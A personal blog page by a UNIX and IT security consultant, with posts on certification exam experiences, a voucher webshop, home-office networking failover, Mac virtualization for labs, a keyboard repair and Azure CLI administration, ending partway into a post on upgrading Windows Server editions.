Kilala.nl - Personal website of Tess Sluijter

Unimportant background
Login
  RSS feed

About me

Hi! I'm Tess Sluijter-Stek. In daily life I'm a UNIX and IT security consultant employed by Unixerius.

I live in Almere with my wife and daughter. In my free time I'm an all-round geek: gaming, studying, drawing...

My LinkedIn.
My Github.
Contact me.

Blog archives

2023

1 2 3 4 6 7 11 12

2022

1 2 4 5 6 7 12

2021

1 2 3 4 5 6 7 8 10 11 12

2020

1 6 7 8 9 10 11 12

2019

1 2 3 4 7 10 11 12

2018

1 3 4 5 6 7 10 11 12

2017

1 2 3 4 5 6 8 9 10 11

2016

1 3 4 5 7 8 9 10 12

2015

3 6 7 9 10 11 12

2014

3 5 7 11

2013

1 2 3 4 5 6 7 8 9 10

2012

1 2 3 4 5 6 7 8 9 10 11 12

2011

1 2 3 4 5 6 7 8 9 10 11 12

2010

1 2 3 4 5 6 7 8 9 10 11 12

2009

1 2 3 5 6 7 8 9 10 11 12

2008

1 2 3 4 5 6 7 8 10 11 12

2007

1 2 3 4 5 6 7 8 9 10 11 12

2006

1 2 5 6 7 8 9 10 12

2005

1 2 3 5 7 8 9 11

2004

2 3 4 9 10 11 12

2003

11

> Weblog

> Sysadmin articles

> Maths teaching

CompTIA ITF+ exam

2023-12-03 11:01:00

After my frustrating start with the exam check-in (started at 08:15, finished at 09:00), I did get to do the CompTIA ITF+ (IT Fundamentals) exam. 

Tess? Why do this most entry-level of junior exams? Two reasons:

  1. I'm test-running it for my students at ITVitae, to see if the curriculum and exam are decent.
  2. I've built a webshop selling heavily discounted CompTIA vouchers and wanted to test the payment process, by buying the cheapest voucher.

So what did I think? 

I like the curriculum / objectives. They cover a wide range of topics, which I feel most people in IT should really be familiar with.

The exam itself was decent, though I'm not a huge fan of how a lot of the questions were worded. In some cases the grammar felt a lot more clunky than I'm used to from Linux+, Pentest+, etc. 

I scored much lower than I'd expected! The range is 100 - 900 points, with a pass at 650. I scored 730, which suggests that I misread questions or that CompTIA wanted me to think about a question differently. Plus, I do believe that one or two questions, I got tripped up by the very weird wording. 

Do I think ITF+ is worth it for the most junior students I will be teaching? Yes, the curriculum is worth it. But I do feel that the exam might be a bit frustrating for them. 


kilala.nl tags: ,

View or add comments (curr. 0)

My first real frustrating encounter with OnVue remote testing

2023-12-03 10:46:00

Two screenshots of a photo app

Today I took CompTIA's ITF+ exam at my office, using PearsonVue's OnVue testing software. This has gone wel for me 10+ times, but today it didn't. 

What changed? I used a desktop Mac instead of my usual laptop. What else went wrong? The check-in process. 

Let's start with that last one: the check-in process.

This has gone perfectly well for me 10+ times. You visit https://mobile.onvue.com on your smartphone, you enter the exam ID and you go through the wizard to take photographs of yourself, your ID and the room. 

The big problem is that the "shutter" button to take the photograph went missing. It was impossible to take the photo.

In the screenshot above, you will see that:

This made it impossible to photograph my ID and to proceed with the check-in. 

I contacted the PearsonVue support team via chat and they did not understand my problem. They asked for error messages, or told me to use my phone (I was), or told me to try my laptop (I didn't have one). 

Why use a laptop? There is a secondary method of taking the photos inside the OnVue exam app itself. It uses your computer's camera for the photographs. This would have worked to some degree, were it not that I was using a desktop PC with a wired camera. 

Plus it turns out that the Logitech 720p camera I have is not good enough to take these pictures as it has fixed focus. 

After a lot of back and forth with support, I accidentally found out (by flicking the screen on my phone) that the camera shutter button is in fact on the ID page, but it's out of view. You have to scroll the layer with the overlay. That was 200% un-intuitive. 

Later on I was also informed that my Wacom pen-tablet is not a permitted peripheral; that was on me, I should have know. Quickly switched to an old mouse.

Lessons learned from todays OnVue exam:

The rest of the exam, after checkin? Zero technical problems. I'll write about ITF+ separately. 


kilala.nl tags: ,

View or add comments (curr. 0)

I didn't think starting a webshop would be this easy

2023-12-01 20:11:00

A few weeks ago my company become official Delivery Partner of CompTIA's, which means that I can now officially also teach classes on their behalf. I've already taught Linux+ for a few years, at ITVitae, but that's using my own materials and the Bresnahan/Blum book.

One other benefit to this partner status, is that we can purchase exam vouchers at a 20% discount. In this, I see the opportunity to help struggling newbies who want to break into IT, even if it's just a little. 

In my life, I've was helped by a great number of people and thus I firmly believe in "lifting up" and in "paying it forward". If I can take a small financial hit, in order to help people take their exams at a cheaper rate, I'll gladly do it. 

Having no prior experience in running a webshop (aside from a few internship projects 25 years ago!), I looked for the nicest-yet-low-barrier solution. 

The Unixerius site is built using Rapidweaver, a MacOS WYSIWYG editor which has made it very easy to quickly whip up a decent looking site. I spent about an hour research options of affordable webshops, only to be happily surprised by Ecwid.

Ecwid are a webshop SaaS provider who offer a full frontend + backend system. They integrate with the payment providers I would need for the European market (Paypal, SEPA and Stripe, which offers iDeal). Their management system is excellent. And their frontend nativel integrates with Rapidweaver. 

It took me roughly three hours to set everything up, from A to Z. And it all works very well, I was my own first customer by test-purchasing an ITF+ voucher.

I will not be doing any big marketing for this shop. It's intended to be a small way to help out struggling students. I'm not looking to piss off the big CompTIA partners by severly undercutting them on large amounts of sales. 

Heck, I'm restricting voucher purchases to one-per-person, to prevent pissing off CompTIA themselves. :)


kilala.nl tags: ,

View or add comments (curr. 0)

Study resources for ISC2's CC exam

2023-11-23 11:39:00

In the summer of 2022, ISC2 introduced what was then called their ELCC exam. These days it's just "CC": Certified in CyberSecurity. At the time I concluded that ISC2's CC is a decent curriculum and exam, for people who need foundational understanding of enterprise-level cybersecurity. 

In October of 2022 and 2023 I ran in-house "study challenges" for my customer, with 10-20 people attempting to pass the CC exam within the one CyberSecurity Awareness Month (CSAM). When we started, all there was to study were the free video trainings from ISC2. 

Since then, new and much better resources have become available!

Remember to never pay full price on Udemy! They run huge discounts very regularly.


kilala.nl tags: ,

View or add comments (curr. 0)

I presented at WICCON about AppSec / DevSecOps

2023-11-01 11:48:00

me on stage

This was so much fun!

WICCON is an IT conference by women, for everybody, featuring a full cast of just women presenting about their work! Next to volunteering in the Black Cat Society, I also submitted a CFP. My talk was accepted. :)

You can view all presentations on WICCON's Youtube channel.


kilala.nl tags: ,

View or add comments (curr. 0)

Virtualization, Linux labs on Apple Silicon

2023-07-17 20:18:00

I've held off on spending money on a new Mac for a long, long time. I have two Macbook Airs from 2017, which are still holding up admirably for my studies and work. Honestly, their 8GB of RAM and aged i5 are still plenty good for most of my work. 

Sure, I did get an Asus laptop with a beefy Ryzen in there, for teaching purposes. But even that's an ultra-portable and nothing hugely expensive. 

I've had to bite the bullet though: the chances of me getting students with Apple Silicon laptops are growing. My current group at ITVitae has my first one and it's a matter of time before a commercial customer pops in with an M1 or M2. 

So, I got myself a second hand 2020 M1 Mac Mini from Mac Voor Minder. Good store, I'd highly recommend. 

I had hoped that, in the three years we've had the Apple Silicon systems out, virtualization would be a solved problem. Well... it's not really, if you want one of the big names. 

VirtualBox, forget about that. It's highly in beta and is useless. VMWare Fusion supposedly works, but I didn't manage to get it to do anything for me. And I'm not paying for Parallels, because most likely my students won't either! I need cheap/free solutions.

Turns out there's two.

  1. UTM, which uses Qemu under the hood. It's brilliant. Looks spiffy, has good options and does both virtualization (aarch64) and emulation (many other architectures). It does not have an API and it does not work with Vagrant. But I love it. 
  2. You can also install Qemu via Homebrew and then use the Vagrant-Qemu plugin to build VMs. It works well, although it doesn't support all great Vagrant options yet. One downside is that the amount of aarch64 images for Qemu on VagrantUp is small. 

I'm now rewriting the lab files for my classes, to make them work on M1/M2 ARM systems. I'm starting with the lab VM for my DevSecOps class and then moving onward to two small projects that I use in class. Updating my Linux+ class will take more work.

Maybe I should start making my own Vagrant box images. :)


kilala.nl tags: , ,

View or add comments (curr. 1)

Preparing for (and passing) Red Hat's EX188, specialist in containers

2023-06-24 12:55:00

It's been well over a decade since I started doing Red Hat certifications, back in th RHEL6 era. Since then I've gone after many exams and certs, taking a few every year although not limited to Red Hat stuff. For Red Hat I'm basically making sure to take a new every 2.5-3 years, so I can offically retain my "RHCE" status from 2014. 

After my frustrating encounter with EX413 (security, 2017) and the fun EX407 (Ansible, 2020), it was time again! Since my agenda and wishlist are so incredibly stuffed, I will admit that I took "the easy way out" in renewing my RHCE by taking EX188.

EX188 is Red Hat's first exam in the line of certifying on the subject of container administration and development. It's about using Podman/Docker, to build and run containers in a local environment. No high availability, no Kubernetes or OpenShift... Basically a big step back from my CKA exam from last year.

But, pragmatism has its place. This year I've got a lot of other plans for my own studies and my work as teacher and this was a solid and educational way to get to a goal quickly.

Preparations

To make sure I'm well enough prepared:

Testing from home

I still very much like that Red Hat will let you take their practical exams from home. Unfortunately they use a much harder-to-use setup than people like Linux Foundation. Preparing to take CKA from home was dead simple. Preparing for Red Hat Kiosk exams is a chore.

 The e-book says my Macbook Air from 2017 should work, but it doesn't. So I used Dick's Lenovo gaming laptop again. It only works with the 2020-08 ISO, because of it's built-in M970 GPU. I also had to buy a cheap Logitech webcam, because my Razer cam didn't work. 

Important: make really, really sure that you test your computer fully way before the scheduled exam date. You must do this. 

The exam itself

I enjoyed it! It's 2.5 hours, for a handful of tasks. Red Hat advise you to first read through all assignments before starting, because one task may rely on another. Reading all tasks will take about fifteen minutes. I advise that you really do read all tasks before starting. 

The task descriptions for EX188 are good. They are thorough and detailed, they give you all the information you need for success. I have two minor squibles with the task texts.

  1. One choice of words that is repeated in each task is ambiguous (but you don't have to worry about it).
  2. One task had two lines in it that 100% contradict each other. They offer an impossible conflict. After discussing the conflict with the proctor, I followed their advice to use a logical approach which rules out the impossibility itself. 

I needed the full 2.5 hours for the exam. I had 85% of the work done after ~1.5, but then needed the remaining 45 minutes for debugging the final 15%.

Again, I really enjoyed the exam. It's well put together, not frustrating at all.


kilala.nl tags: ,

View or add comments (curr. 0)

Setting up Internet failover on UDM Pro, with Teltonika RUT241

2023-04-21 18:37:00

It's no secret that I use Ubiquiti equipment for my networking. My office runs on a UDM Pro, which has been great for me. 

The UDM Pro performs well and stable, it has a great feature set and it's easy to manage (for someone who wants to spend little time managing their network). Heck, even site-to-site VPN for my security cameras was simple!

My main WAN connection comes from MAC3Park, my housing company. They recently had an outage on my Internet connection, which lasted a few days. That messes with my backups and a few of my business processes, so I want to have at least some form of alternative in place. 

Luckily, the UDM Pro also makes it dead simple to configure automatic failover or even load balancing across two WAN connections! It really is amazingly simple! Or it should be, as we'll see in a bit. 

As a second Internet connection, I looked into getting 4G/5G from my mobile provider. Ubiquiti have their own LTE/4G/5G solution, which looks awesome but is a bit expensive. For half the price, I got a Teltonika RUT241 aimed at IoT solutions.

Sure, the LAN port on the RUT241 is slower (10/100Mbit), but seeing how the 4G connection averages around 20MBit that'll be fine. That's also where the "should be simple" I mentioned earlier comes in. 

The RUT241 worked great with my laptop, but hooking it up to the SFP RJ45-module on the UDM Pro it just wouldn't go. No amount of changing settings would make it work. Very odd! There was no DHCP lease and even a statically assigned IP wouldn't let me connect to the Teltonika.

Turns out that, upon closer inspection, my vendor sent me the wrong SFP module :) I'd ordered the 1G model (which does 10/100/1000), but they sent me the 2.5G (which does 1000/2500/10000). The latter will not work with the Teltonika. 

Time to get that SFP replaced by my vendor and we'll be good to go!

EDIT:

Or even better! I could just switch my cabled connection from MAC3Park (which is 1G) to port 10 and switch the Teltonika to port 9 (which natively does 100/1000). So basically, switch the definitions of WAN1 and WAN2 around!

EDIT2:

That worked. 

I made port 9 WAN2 and port 10 WAN1. I switched the cables around and now port 9 happily runs at 100Mbit, connected to the Teltonika.

Even nicer: in bridge mode, port 9 gets the 4G IP address so it's perfectly accessible as intended. But in that same bridge mode, the RUT241 remains accessible on its static, private IP as well so you can still access the admin web interface. 

So if, for example, my internal LANs are 10.0.10.0/24 and the Teltonik's private IP is 10.0.200.1, I've setup a traffic management route which says that 10.0.200.0/24 is accessible via WAN2. That way I can manage the Teltonika web interface, from inside my office LAN, even when it's in bridge mode. Excellent!

EDIT3:

I tested the setup! 

Setting the UDM Pro to failover between the connections works very well. Within 60 seconds, Internet-connectivity was restored. It does seem that the dynamic DNS setup does not quickly switch over, so a site-to-site VPN will fail for a lot longer.

Setting the UDM Pro to load balancing didn't work so well. The connection remained down after I pulled WAN1.


kilala.nl tags: , ,

View or add comments (curr. 0)

PECB ISO/IEC 27001 Lead Implementer: training, examination and certification

2023-04-19 11:29:00

This month, I've put some time into formalizing my experience with the ISO 27001 standard for "Information Security Management Systems". That is, the business processes and security controls which an organization needs to have in place to be accredited as "ISO27001 certified"... which translates into: this organization has put the right things into place to identify, address and manage risk and to provide personnel and management with policies, standards and guidelines on how to securely operate their IT environment. 

It's a cliché that people in IT have a distaste for "auditing" and "compliance". And sure, I've never had much fun with it either! But I felt I was doing myself a disservice by not formalizing what I've learned over the past decades. Or to put it the other way around: making sure I properly learn the fundamentals, means that I can assist my customers better in properly structuring their IT security. 

So off I went, to my favored vendor of InfoSec trainings: TSTC in Veenendaal. :) 

They provide the PECB version of the ISO27001 LI training and examination. The PECB materials aren't awesome, but they get the job done. And yes, if you're a hands-on techie, then the material can be rather dreary. But overall I had a fun four days at TSTC, with a great class and a solid trainer. 

The exam experience was a bit different from what I'm used to with other vendors.

TLDR, in short:


kilala.nl tags: , ,

View or add comments (curr. 0)

CFR 410: quick follow-up

2023-03-29 21:41:00

As a quick follow-up to this week's post about CSC 210 and CFR 410: I've now also gone through the majority of the course book for CFR 410. 

Like CSC I can say I'm of the opinion that the course book for CFR is solid. It's good. I might not like the CFR exam, but the book is good!


kilala.nl tags: ,

View or add comments (curr. 0)

CertNexus CSC 210 and CFR 410

2023-03-24 10:27:00

About a month ago I re-sat CompTIA's Linux+ exam, to make sure I am still preparing my students properly for their own exams. I still like the Linux+ exam (which I first beta-tested in 2021) and I'm happy to say that my course's curriculum properly covers all "my kids" need to know.

This week I sat not one, but two exams. That makes four this year, so far. :D

Why the sudden rush, with two exams in a week? I'm applying as CertNexus Authorized Instructor, through an acceleration programme that CN are running. They invited professional trainer to prepare and take their exams for free, so CN can expand their pool of international trainers. 

I feel that's absolutely marvelous. What a great opportunity! I heartily applaud CertNexus for this step.

The first exam which I took was CSC-210: Cyber Secure Coder. The curriculum had a nice overlap with the secure coding / app hacking classes that our team taught at ${Customer}, which means it's a class I would feel comfortable teaching. It's not programming per sé, it's about having a properly secure design and way-of-work in building your software. The curriculum is language agnostic, though the example projects are mostly in Python and NodeJS. 

I went through the official book for CSC and I like the quality. I actually enjoyed it a lot more than CompTIA's style. I haven't gone through the slide decks yet, so I can't say anything about those yet. The exam, I really liked. The questions often tested for insight and when it asked to define certain concepts, it wasn't just dry regurgitation. 

I can definitely recommend CertNexus CSC to anyone who needs an entry-level training and/or certification for secure development. 

Now, CFR-410 (CyberSec First Responder) is a different beast. I took the beta back in 2021 and at the time I was not overly impressed. The exam has stayed the same: it still asks about outdated concepts and it still has dry fact-regurgitation questions. 

I haven't gone through the book and slides yet, I'll do that this weekend so I can update this post. 

have contact CertNexus to offer them feedback and help, so we can improve CFR. Simply complaining about it won't help anyone, I'd rather help them improve their product.

EDIT: CertNexus have indicated they will welcome any feedback I can provide them for CFR, so that's ace. I will work with them in the coming weeks. 


kilala.nl tags: , ,

View or add comments (curr. 0)

The value (or not) of Linux+

2023-03-18 19:30:00

On Discord, people frequently ask whether "is Linux+ worth it?". Here's my take.

The value depends on your market and on what you get out of it. In the US and UK, CompTIA is a well-known vendor but in other parts of the world they aren't. But left or right, Linux+ is not very well known.

I teach at a local school to prep young adults for the Linux+ exam. The school chose Linux+ because they can get heavily discounted vouchers for the exams, versus LPI, LF and others. For the school it was a matter of money: they really don't have much money and every dollar helps. 

Personally, I feel that the Linux+ curriculum is pretty solid as far as Linux sysadmin certs go. The exam itself is also decent and the vendor is mature. 

So in this case the value you'll get is from learning Linux system administration pretty in-depth. You'll also get a slip of paper which some might recognize and others will go "*cool, you passed a cert exam, good job*" (in a positivie sense). 

Linux+ is not worthless, it's just worth less (when compared to LFCS, LPIC1 and RHCSA).


kilala.nl tags: , ,

View or add comments (curr. 0)

DevSecOps: who's responsible?

2023-03-04 08:20:00

Someone on Discord asked: "Question: Does DevSecOps type of work fall under ISSO's roles and responsibilities?"

That got me thinking. 

IMO: DevSecOps, like many things in InfoSec, is something everybody needs to get in on! 

Architects need to define reference designs and standards. The ISO needs to define requirements based on regulations and laws and industry standards. An AppSec team needs to provide the tooling. Another team needs to provide CI/CD pipeline integration for these tools. And yes, the devops squads themselves need to actually do stuff with all of the aforementioned things. Someone needs to provides trainings, someone needs to be doing vulnerability management. Etc.

One book on the subject which I heartily recommend, is the Application Security Program Handbook, by Derek Fisher.

I bought that book right after leaving my previous AppSec role, where we spent two years building an AppSec team that did a lot of things from that list. I was amazed by the book, because cover to cover it's everything we self-taught over those two years.


kilala.nl tags: ,

View or add comments (curr. 0)

You've got your Security+. Now what?

2023-02-26 12:55:17

On /r/comptia and Discord, there's a lot of people hopeful to break into cybersecurity. The get their Security+ (because CompTIA's marketing promises a lot of jobs), but... then what?

Here's something I told someone on Discord the other day.

CompTIA will have a big list of options in their marketing fluff, but as I said I personally don't believe Sec+ preps you for any particular roles.

That doesn't mean it's not valuable! Quite the opposite! Having passed Sec+ means you bring fundamental InfoSec knowledge to any role you'll work in, be that user support, systems administration, network operations, DevOps, IAM, risk management, or whatever.

Career wise, it makes sense to define short and longterm goals for yourself. Investigate what different jobs in your local marketplace mean, what the work involved actually is and check their requirements.

${Deity}, I'm saying the things I hated hearing twenty years ago, but here we are.

Next to those goals, also investigate the options available to you in your local marketplace. Also take stock of your current set of experience and skills. This information will help you figure out what kind of tools are at your disposal to meet your goals.

For example, say that your long term goal is to have a hardcore technical role in cyber security. Like pen-tester maybe, DevSecOps engineer or cloud security engineer.

From that you would start figuring out which of those roles sound best to you and figure out what you need to learn to get there. This will help you define short term goals... mile stones, if you will.

For example, if you already have some prior IT experience and you've dabbled with programming and Linux, then you could aim for junior devops or sysadmin roles for the short term. If you've already done a lot of TryHackMe, HackTheBox then a junior pentesting role, or junior devsecops.

Now, if you have zero IT experience, then you're going to have to take a different route. One option is to start way lower in the IT ladder, like IT support. Another option is to go for a soft-skills based role! Like user awareness training, or risk management.

Here's a very long Reddit thread about why it's hard to break into InfoSec right from the start.

Which reminds me of a solid tip: check your local market for MSSPs: managed security service providers. They are often in a position to train juniors with little IT experience into the job. They need warm bodies to take care of the low-level work influx and can help you build experience and knowledge on the job.


kilala.nl tags: ,

View or add comments (curr. 0)

Preparing for Server+: labs?

2023-02-26 11:56:00

On the CompTIA sub-reddit, people often ask for labs to work through while prepping for an exam. For Linux+, I've made all the labs for my class freely available on Github. 

Server+ is a less common CompTIA exam, which focuses on sysadmin / data center admin roles. There's quite some overlap between A+, Linux+ and Security+; I kinda liked it!

Here's a few suggestions which I gave for practice for SK0-005 Server+

Unfortunately a lot of the aspects of Server+ relate to actually working in a data center, so it'll be hard to have labs for those sections.

Most of objective 1 you will need to have actual hardware for. If you're in the US, you can check LabGopher to find gear for your homelab. Otherwise, check your local nerdery forums or just eBay. A Dell R410 or R420 with Perc and RAID controller will set you back 100-400 dollars depending on specs and if hardware is included.

If you're already in IT, you can also ask your server admin team if they'd be willing to show you the ropes for objective 1.

Many of the topics in objective 2 can be practiced if you have a few VMs that run Windows, Windows Server and Linux to try out the various related tools. You can run these VMs on just about any recent laptop with 8GB or more of RAM and an i5/i7/i9 or similar Zen2 processor.

Virtual networking on objective 2 can be practiced with VMWare ESXi and pfSense.

The good part is that the software mentioned so far can be gotten for free legally. Windows is available for free use on 180-day licenses (which can be renewed multiple times). VMWare ESXi can be gotten on a free license, also for studying/lab purposes.

Licensing and asset management are mostly theoretical on Server+

Objective 3 is partially theoretical/conceptual, but there's a few practical aspects as well. Server hardening is something you can practice with the aforementioned VMs by reading and applying STIGs or CIS Benchmarks. If you're familiar with Ansible, you can even dive into the relevant playbooks. IAM can be practiced with Active Directory and/or Azure AD.

Objective 4 again is a nice mix of theory and practice. LogHub is a nice resource to read through all types of different log files. A lot of the other troubleshooting objectives can be exercised with the lab VMs and hardware I mentioned simply by trying to get it all to work :D That can sometimes already be a struggle, so you're troubleshooting!

Multiple objectives relate to services which you can run, configure and test on Linux VMs. NTP and SSH are two common ones, which I also include in my Linux+ labs. Ditto for the networking config + troubleshooting.


kilala.nl tags: ,

View or add comments (curr. 0)

Practical DevSecOps CTMP course and exam

2023-01-16 07:20:00

In early 2021 I needed to learn about DevSecOps and CI/CD and I needed it fast. A crash course if you will, into all things automation, pipelines, SAST, SCA, DAST and more. I went with PDSO's Certified DevSecOps Professional course, which included a 12h hands-on exam.

Here's my review from back then, TLDR: I learned a huge amount, their labs were great, their videos are good, their PDF was really not to my liking. 

Since then I've worked with a great team of people, team Strongbow at ${Bank}, and we've taught over a thousand engineers about PKI, about pentesting, about API security and about threat modelling. So when PDSO introduced their CTMP course (Certified Threat Modelling Professional) I jumped at the chance to formalize my understanding of the topic.

My review of the training materials is going to be very similar to that of CDP:

I took the exam yesterday and it was great, better than I expected!

For anyone looking for tips to take the CTMP exam:


kilala.nl tags: , ,

View or add comments (curr. 0)

An actual office for Unixerius

2023-01-08 19:58:00

Before and after redecoration

Way back when, over ten years ago, Dick had rented some local office space for Unixerius. He used it for storage, I don't think anyone ever did some actual work over there. So, that rental space wasn't long-lived.

After Dick's passing in 2021, I took over running Unixerius in January of 2022. One practical hitch about owning a company which I didn't care for, is having my private home address in the chamber of commerce's registry. That's why I rented a flex-desk at the now defunct Data Center Almere

Per the start of 2023 I'm now renting an actual office space again, at MAC3Park. They gave me a good deal on a 25m2 room, with eletricity and Internet-access included. And because the previous tenant had left in a hurry there was even some furniture left behind! They were going to toss it all, but I was very happy to have a big desk, decent chair and a comfy sofa!

The only downside to the room was the awfully bad paintjob a previous tenant had done. Dreary grey, with streaks, splotches, grease marks and overspray. I spent the week between Christmas and New Year's redecorating and cleaning. It's now a very, very comfortable office for work and studying!

The Ikea book case used to be in my kid's room and now holds memorabilia to past jobs, teams, colleagues and students. 


kilala.nl tags: ,

View or add comments (curr. 0)

Microsoft Natural Ergonomic 4000 keyboard: fixing non-functional key

2023-01-06 19:43:00

Keyboard membranes

I've been using Microsoft's ergonomic keyboards for close to twenty years now. I've had Comfort Curve models and Natural Ergonomic ones. The Natural Ergonomic 4000 has been my daily driver at the office for years. 

I hated it when it broke down. Or... When literally one of the keys broke down. Every single key on the keyboard worked fine, except the letter "c". It just wouldn't go. Nada. 

Thanks to user teevothis's disassembly video on YouTube, I found the four two screws I never managed to find before.

Opening her up, yes there were quite some crumbs and dust. But nothing overtly wrong. Pressing contacts on the membranes directly worked as expected, but the "c" also didn't work this way. A quick visual check of the contacts for the "c" showed no damage, nor debris interfering with the contact.

Visual inspections of the traces leading to the "c" also didn't show any clear damage.  It did show that the "c" key is at the end of a specific series of contacts, which explains why it's the only key on the whole keyboard that's malfunctioning: something is interfering with its individual trace(s).

There were a few splotches of brown on the keyboard membranes, which suggests I at one point spilled cola in my keyboard. So, I did something scary: I disassembled the actual membranes, which separate into three layers of plastic. There's the bottom layer with traces on top, a middle insulating layer and the top with traces on both sides of the plastic. 

To take the membranes apart, there are four places where the plastic was melted together which you need to carefully destroy. :D A scalpel will do fine, as long as you're very careful. 

I cleaned all three layers, on both sides each, and let'm dry. Putting things together bit by bit: Halleluyah! It worked again!

My hypothesis: some spillage from the cola had gotten into one of the layers of the membrane, shorting the trace for the "c" to its neighbor. Oddly, its neighbor wasn't affected.


kilala.nl tags: ,

View or add comments (curr. 1)

Lock your laptops: the pentest fairy strikes!

2022-12-29 19:27:00

My colleague and I have often wondered about people leaving their laptops unattended and unlocked. We've found them in offices, in restaurants and even lavatories!

This inspired me to do a co-op with my daughter, who took my character design for the #pentest fairy and put her own twist on it. We now have a stack of vinyl stickers (safely removable!) which you can slap on any abandoned hardware.

"You had a visit from the Pentest Fairy! Lock your laptop!"


kilala.nl tags: , ,

View or add comments (curr. 0)

Practicing with azcli, to build an Azure DevOps lab

2022-07-09 20:52:00

This fall I am scheduled to teach an introductory class on DevSecOps, to my Linux+ students at ITVitae. Ideally, if things work out, this will be a class that I'll teach more frequently! It's not just the cyber-security students who need to learn about DevSecOps, it's just as important (if not more) to the developers and data scientists!

Since this course is going to be hands-on, I'm prepping the tooling to configure a lab environment with students forming small teams of 2-4. I'd hate to manually set up all the Azure DevOps and Azure Portal resources for each group! So, I'm experimenting with azcli, the Azure management command line tool. 

Sure, I could probably work even more efficient with Terraform or ARM templates, but I don't have time enough on my hands to learn those from scratch. azcli is close enough to what I know already (shell scripting and JSON parsing), to get the show on the road. 

Here's a fun thing that I've learned: every time one of my commands fails, I need to go back and make sure that I didn't forget to stipulate the organization name. :D 

For example:

% az devops security group membership add --group-id "vssgp.Uy0xLTktMT....NDk0" --member-id "aad.ODU0MjMyZTAtN...0MmVk"

Value cannot be null.

Parameter name: memberDescriptor

That command was supposed to add one of the student accounts from the external AD, to one of the Azure DevOps teams I'd defined. But it keeps saying that I've left the --member-id as an empty value (which I clearly haven't).

Mulling it over and scrolling through the output for --verbose --debug, I just realized: "Wait, I have to add --org to all the previous commands! I'm forgetting it here!". 

And presto:

az devops security group membership add --group-id "vssgp.Uy0xLTktMT....NDk0" --member-id "aad.ODU0MjMyZTAtN...0MmVk" --org "https://dev.azure.com/Unixerius-learning/"

That was it!

 


kilala.nl tags: , ,

View or add comments (curr. 1)

More beta exams! ISC2 ELCC and CompTIA Linux+ 005

2022-06-29 21:28:00

At the end of 2021 I took the beta version of Comptia's XK0-005, which went live earlier this month as XK1-005. My opinions on the exam still stand: it's a solid exam with a good set of objectives. And luckily I passed. :D

Yesterday, I took part in another beta / pilot: (ISC)2's ELCC, also known as their Entry Level Cybersecurity Certification. I didn't take it to pad my own resumé, I did it to see if ELCC will make a good addition to my student's learning path. So far they've been using Microsoft's MTA Security (which is going away).

(ISC)2, most famously known for their CISSP certification, saw an opportunity in the market for an entry level security certificate. Some would call it a moneygrab... But the outcome of it, is their ELCC.

Looking at the ELCC exam objectives I have to say I like the overall curriculum: the body of knowledge covers most of the enterprise-level infosec knowledge any starter in infosec would need to know. It's very light on the technical stuff and focuses mostly on the business side, which I think is very important!

I've heard less-than-flattering reviews of (ISC)2's online training materials, meaning that I'd steer students to another source. And, having taken the exam, I have to admit that I think it's weak. 

Maybe it's because this was a beta exam, but a few topics kept on popping up in questions with the same question and expected-answer being given in slightly different wordings. With 100 questions on the test, I was expecting a bit more diversity. 

I also feel that a lot of the questions were about dry regurgitation: you learn definitions and when provided a description, you pick the right term from A, B, C or D. CompTIA's exams take a very different approach, where you're offered situations and varying approaches/solutions to choose from. 

Overall take-aways regarding ISC's entry-level cybersecurity certification:


kilala.nl tags: , ,

View or add comments (curr. 0)

Nostalgia: VMEbus and OS-9

2022-06-15 06:35:55

Recently I've been thinking back about old computing gear I used to own, or worked on in college. Nostalgia has a tendency to tint things rose, but that's okay. I get pangs of regret for getting rid of all my "antiques" (like the Televideo vt100 terminal, the 8088 IBM clone, my first own computer the Pressario CDS524) but to paraphrase the meme: "Ain't nobody got room fo' all that!"

Still, it was really cool to run RedHat 5 on the Compaq and having the Televideo hang off COM1 to act as extra screen and keyboard.

Anyway... that blog post I linked to, regarding RH5, also mentions OS-9. OS-9 was (is, thanks to NitrOS9). It was an OS ahead of its time, with true multi-user and multi-processing, with realtime processing all on at the time relatively affordable hardware. It had MacOS and Windows beat by at least a decade and Linux was but a glint in the eyes of the future.

I've been doing some learning! In that linked blog post I referred to a non-descript orange "server". Turns out, that's the wrong word to use!

In reality that was a VMEbus "crate" (probably 6U) with space for about 8-10 boards. Yes it used Arcnet to communicate with our workstations, but those also turn out to be VMEbus "crates", but more like development boxen with room for 1-2 boards in a desktop box.

Looking at pictures on the web, it's very likely that the lab ran OS-9 on MVME147 boards that were in each of the crates.

Color me surprised to learn that VMEbus and its successors are still very much in active use, in places like CERN but also in the military! But also in big medical gear, like this teardown of an Afga X-Ray machine shows.

Cool stuff! Now I wanna play with an MC68k box again. :)


kilala.nl tags: , , ,

View or add comments (curr. 1)

Comparing Linux+ objectives between XK0-004 and XK0-005

2022-05-11 17:43:00

Finally, the CompTIA Linux+ beta embargo has lifted! I can post the comparison I made of the objectives between XK-004 and 005!

In the spreadsheet, you'll see:


kilala.nl tags: ,

View or add comments (curr. 0)

Passed the CKA exam

2022-05-08 09:19:00

It's been a very long time in coming, but I finally passed my CKA (Certified Kubernetes Admin) exam yesterday. 

When I say "a long time", I mean that this path of studying started back in August 2021 right after finishing teaching group 41 at IT Vitae. Back then, I started out on the Docker learning path at KodeKloud, to get more familiar with containerization in general. I'd considered going for the DCA exam, but comparing it to CKA I reconsidered and added a lot more studytime to just hop onward to Kubernetes.

I can not say enough positive things about KodeKloud. The team has put a lot of effort into making great educational content, as well as solid lab environments. The cost-value comparison for KodeKloud is excellent! I plan on finishing their DCA content later this year, so I can then turn to RedHat's EX180 (Docker/Podman and OpenShift) exam.

Aside from KodeKloud's training materials, the practice exams at Killer.sh were great. You get two free practice exams as part of your CKA exam voucher and I earned a third run by submitting some bug reports. 

Again, the value for money at killer.sh is great: in-depth exercises, a stable testing environment and a exam setup that properly prepares you for the online CKA testing environment. 

Finally, the actual exam: registration was an okay process, signing in with the proctor went excellent and the exam itself worked fine as well. I did learn that Linux Foundation are very strict about the name put on your registration. I put in "T.F. Sluijter-Stek" because legally that is my identity, but they actually wanted "${FirstName} ${LastName}" so for me my "${DeadName} ${MaidenName}". Oh well; no biggy. The proctor was very patient while I went and updated my name on the portal. 

So to summarize: 


kilala.nl tags: , ,

View or add comments (curr. 0)

Windows Server: upgrade from ServerDataCenterEval to ServerStandard

2022-04-18 15:52:00

For those who just want the answer to the question: "How do I upgrade a Windows Server DataCenter Evaluation edition to a licensed Windows Server Standard?", here's where I got my answer. I'll provide a summary at the bottom.

---

My homelab setup has a handful of Windows Server systems, running Active Directory and my ADCS PKI system. Because the lab was always meant to just mess around and learn, I installed using evaluation versions of Windows Server.

